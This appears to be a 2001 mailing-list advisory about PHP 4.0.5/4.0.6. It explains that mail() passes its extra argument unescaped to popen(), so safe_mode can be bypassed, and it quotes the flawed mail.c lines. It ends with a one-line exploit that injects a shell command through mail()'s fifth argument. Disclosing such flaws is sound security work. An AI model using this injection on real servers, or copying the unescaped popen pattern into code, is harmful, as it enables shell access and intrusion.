php mail() function does not do check for escape shell commandes, even if php is running in safe_mode. So it's may be possible to bypass the safe_mode restriction and gain shell access. Affected: php4.0.6 php4.0.5 Significatives lines of ext/standard/mail.c: >extra_cmd = (*argv[4])->value.str.val; >strcat (sendmail_cmd, extra_cmd); >sendmail = popen(sendmail_cmd, "w"); Exploit: mail("totoat_private", "test", "test", "test", "; shell_cmd");
This archive was generated by hypermail 2b30 : Wed Jul 18 2001 - 08:55:10 PDT